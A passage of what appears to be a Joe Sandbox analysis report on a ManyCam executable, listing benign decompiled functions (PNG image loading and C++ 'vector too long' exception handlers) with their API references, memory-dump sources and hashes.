Opcode Fuzzy Hash: b1f5f912a3a6442a3cc382653bc540b1293c177797d8700b4929a6cfcbca8e46
Instruction Fuzzy Hash: 363117B1D1520CABCB04EFA9D945BDDBFB4FB08304F10852EE42577281D7745909CB98

Function 0041C830 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB6AA
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB711
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB76F
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB787

_DebugHeapAllocator.LIBCPMTD ref: 0041C8AC

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

_DebugHeapAllocator.LIBCPMTD ref: 0041C8EA
?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,.png,0041C80E,00000049,0053F620,data\images\maindlg\,00000049,?,00000000,744843B1,?,0041C80E,0000000C,00000049), ref: 0041C90D

Strings

data\images\maindlg\, xrefs: 0041C8A4
.png, xrefs: 0041C8E2

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$Image@@Load@
String ID: .png$data\images\maindlg\
API String ID: 1315443971-2402009575
Opcode ID: 1ae46db1c05b4e9d5e20b3199a0bbc276ac8498851860a350528a00f3f14c102
Instruction ID: 95f2c906bb04f7db6848c29b7cfe536fa7cadaced1f5336b0e2a281727f52370
Opcode Fuzzy Hash: 1ae46db1c05b4e9d5e20b3199a0bbc276ac8498851860a350528a00f3f14c102
Instruction Fuzzy Hash: AD312DB1D05248EBCB04EFA5D986BDDBBB4FF18714F10452EE01577291D7746A08CBA8

Function 0041DB20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB6AA
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB711
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB76F
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB787

_DebugHeapAllocator.LIBCPMTD ref: 0041DB9C

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

_DebugHeapAllocator.LIBCPMTD ref: 0041DBDA
?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,.png,?,?,005405C4,data\images\maindlg\,?,?,?,744843B1,Zoom in,CameraDlg\btn_zoomIn,00000000,?), ref: 0041DBFD

Strings

data\images\maindlg\, xrefs: 0041DB94
.png, xrefs: 0041DBD2

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$Image@@Load@
String ID: .png$data\images\maindlg\
API String ID: 1315443971-2402009575
Opcode ID: 339cf44c9e6672a47bb4ab3fad3452b9ff9abffd4164bb4841253d5f49bda66a
Instruction ID: d4b00160755fc9498c9e644aa4a373da1a989c0672b95b20752ea7274bdd65c2
Opcode Fuzzy Hash: 339cf44c9e6672a47bb4ab3fad3452b9ff9abffd4164bb4841253d5f49bda66a
Instruction Fuzzy Hash: 03313AB1D052089BCB04EF94D945BDEBBB4FB48318F20852EE516772C1D7746A48CBA8

Function 004AE0D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,00533079,000000FF,?,004CA363,004C9539), ref: 004AE0FD
std::bad_exception::bad_exception.LIBCMTD ref: 004AE111
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 004AE11F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00533079,000000FF,?,004CA363,004C9539), ref: 004AE12E

Strings

vector<T> too long, xrefs: 004AE0F5

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: ae87a26418053443f0edf2846f8f275329f855a056418cc1095f19f45bc3fa38
Instruction ID: 992c7d1c538af7c9c0ce4edad66a1111de3b001cb72a08a5d5271ad12714ae45
Opcode Fuzzy Hash: ae87a26418053443f0edf2846f8f275329f855a056418cc1095f19f45bc3fa38
Instruction Fuzzy Hash: CCF04FB1944648EBCB14DF94ED45FDDBB78FB14720F50426AF812A32D0DB756A08CB54

Function 004307E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,0052A649,000000FF,?,004304C6,?,744843B1), ref: 0043080D
std::bad_exception::bad_exception.LIBCMTD ref: 00430821
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 0043082F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,0052A649,000000FF,?,004304C6,?), ref: 0043083E

Strings

vector<T> too long, xrefs: 00430805

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: e084c971732a66b90e1072e7244ee56ba224c388b66ba4f93c615bfa38d58c9c
Instruction ID: 84ce0209dc11d6b23fc1989ca18a4f5fc0ac43ec5a2d3810fda43137453e27bd
Opcode Fuzzy Hash: e084c971732a66b90e1072e7244ee56ba224c388b66ba4f93c615bfa38d58c9c
Instruction Fuzzy Hash: FCF0A9B1944248EBCB14DFA0ED41FDDBB78FB04720F40022AF822A32C0EB756A08CB54

Function 004E27F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,?,00000000,00536A69,000000FF,?,004E144B,744843B1), ref: 004E281D
std::bad_exception::bad_exception.LIBCMTD ref: 004E2831
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 004E283F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,?,00000000,00536A69,000000FF,?,004E144B), ref: 004E284E

Strings

vector<T> too long, xrefs: 004E2815

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: dc35638380dab2938959a34dbcce56baedfc7c7e4cd6927fef2e7d6d97a3b54c
Instruction ID: 0a4d440cb5536f40db0fd076e9c7fc5d2a12fc606929b1cb6c9b0b09eff913f8
Opcode Fuzzy Hash: dc35638380dab2938959a34dbcce56baedfc7c7e4cd6927fef2e7d6d97a3b54c
Instruction Fuzzy Hash: B4F03CB1944648EBCB14DF94ED45B9DBB78FB14720F50426AA812A32D0DB756A08CB54

Function 00412890 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,00528FB9,000000FF,?,00411C76,?,744843B1), ref: 004128BD
std::bad_exception::bad_exception.LIBCMTD ref: 004128D1
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 004128DF
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00528FB9,000000FF,?,00411C76,?), ref: 004128EE

Strings

vector<T> too long, xrefs: 004128B5

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: c780cc5cd66b70a61fb923b6734da329fed68386e0d1462283d30a24de8a1d3f
Instruction ID: 4f722f1132bf029aa43680a0f31b4d6b59234f2f3b0eea29470ee80f38ab1d71
Opcode Fuzzy Hash: c780cc5cd66b70a61fb923b6734da329fed68386e0d1462283d30a24de8a1d3f
Instruction Fuzzy Hash: B3F08CB1904248EBCB14DF90ED41B9DBB78FB04720F40022AB812A32C0EB756A08CB54

Function 004D4940 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,00535729,000000FF,?,004D3CB6,00000000,744843B1), ref: 004D496D
std::bad_exception::bad_exception.LIBCMTD ref: 004D4981
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 004D498F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00535729,000000FF,?,004D3CB6,00000000), ref: 004D499E

Strings

vector<T> too long, xrefs: 004D4965

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: f5e9ddf57e258ff8f81d687b94cbb6babb7938dca145e5172867018050d52fb0
Instruction ID: 2198fcef12488e2d17d3691da39b82749544227340ee56d3737a145847e009f6
Opcode Fuzzy Hash: f5e9ddf57e258ff8f81d687b94cbb6babb7938dca145e5172867018050d52fb0
Instruction Fuzzy Hash: 21F0A9B1904648EBCB14DFA0ED41FDDBB78FB04720F40022AF822A32C0EB756A08CB54

Function 0048EBA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,00531039,000000FF,?,0048BAC3,?), ref: 0048EBCD
std::bad_exception::bad_exception.LIBCMTD ref: 0048EBE1
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 0048EBEF
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00531039,000000FF,?,0048BAC3,?), ref: 0048EBFE

Strings

vector<T> too long, xrefs: 0048EBC5

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 1ea01a54b671203e94099090e90c6f810493855dc45a6ce695e3d5e9399e45a7
Instruction ID: 92daabea73afc4e90302cbcf7baf13e44f6b9f868eface51cfc7e975ed78bb7a
Opcode Fuzzy Hash: 1ea01a54b671203e94099090e90c6f810493855dc45a6ce695e3d5e9399e45a7
Instruction Fuzzy Hash: 95F03CB1944648EBCB14DFA4ED45B9DBB78FB14720F50426AE812A32D0DB756A08CB54

Function 0044ED50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,0052CF99,000000FF,?,0044CB83,00000000), ref: 0044ED7D
std::bad_exception::bad_exception.LIBCMTD ref: 0044ED91
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 0044ED9F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,0052CF99,000000FF,?,0044CB83,00000000), ref: 0044EDAE

Strings

vector<T> too long, xrefs: 0044ED75

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 5b8e1bbaaa4858481c8b052d95aae316f4802631e30b8cefb630b981b18aab31
Instruction ID: f5a7866f547bb55f07dc25e2db114e65ea79899798aec203e725cd6f1ff4eb0e
Opcode Fuzzy Hash: 5b8e1bbaaa4858481c8b052d95aae316f4802631e30b8cefb630b981b18aab31
Instruction Fuzzy Hash: E2F0AFB1904248EBCB14DF90ED41FDDBB78FB04720F40022AF812A32C0EB756A08CB54

Function 00430D10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,0052A699,000000FF,?,004301A3,00000000), ref: 00430D3D
std::bad_exception::bad_exception.LIBCMTD ref: 00430D51
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 00430D5F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,0052A699,000000FF,?,004301A3,00000000), ref: 00430D6E

Strings

vector<T> too long, xrefs: 00430D35

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 4e7c7e61b8e4b61418f89952c155b68a96c666f8f64ae422fdef5ea6b294711e
Instruction ID: 2c432eddfbe67746ec497c333af96acf5ab7e20aac0011f52034aeffc7690669
Opcode Fuzzy Hash: 4e7c7e61b8e4b61418f89952c155b68a96c666f8f64ae422fdef5ea6b294711e
Instruction Fuzzy Hash: 43F0A9B1904248EBCB14DFA0ED41FDDBB78FB04720F40022AF822A32D0EB756A08CB54

Function 0049EEA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,00531FD9,000000FF,?,0049E8F3,?), ref: 0049EECD
std::bad_exception::bad_exception.LIBCMTD ref: 0049EEE1
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 0049EEEF
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00531FD9,000000FF,?,0049E8F3,?), ref: 0049EEFE

Strings

vector<T> too long, xrefs: 0049EEC5

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 164d6ffe732d9fa8baa0de175643794e8cd3c3d995353351aea268910f753e13
Instruction ID: 9df2125c4ef5457798524062e3a11b60d2f3a7f222f2b8b9a439bf1f8e3d57c1
Opcode Fuzzy Hash: 164d6ffe732d9fa8baa0de175643794e8cd3c3d995353351aea268910f753e13
Instruction Fuzzy Hash: 0DF03CB1944648EBCB14DFA4ED45B9DBB78FB14720F50426AB812A32D0DB756A08CB54

Function 0048F010 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,00531089,000000FF,?,0048BDE3,?), ref: 0048F03D
std::bad_exception::bad_exception.LIBCMTD ref: 0048F051
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 0048F05F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00531089,000000FF,?,0048BDE3,?), ref: 0048F06E

Strings

vector<T> too long, xrefs: 0048F035

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 71dadd736df40f3aec662dc85990cd5a9acc2abe6039822e8930e788f3d2d61d
Instruction ID: 682a0ac2237076830f2f8a4780188971040c04754dbc9da0d02d05fab003b1b6
Opcode Fuzzy Hash: 71dadd736df40f3aec662dc85990cd5a9acc2abe6039822e8930e788f3d2d61d
Instruction Fuzzy Hash: EAF04FB1944648EBCB14DFA4ED45FDDBB78FB14720F50426AF812A32D0DB756A08CB54

Function 005154A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,00539FA9,000000FF,?,00514D33,00000000), ref: 005154CD
std::bad_exception::bad_exception.LIBCMTD ref: 005154E1
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 005154EF
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00539FA9,000000FF,?,00514D33,00000000), ref: 005154FE

Strings

vector<T> too long, xrefs: 005154C5

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 3248949544-3788999226
Opcode ID: 21906fa773c1a88a46cbeca3caa33a554fe8bf6e2e2ae55b577b5ad68c6107b2
Instruction ID: 3b973596a2f941747c7d90d8fc74631754525317a6dec37d5ee4e5a0a6c799d4
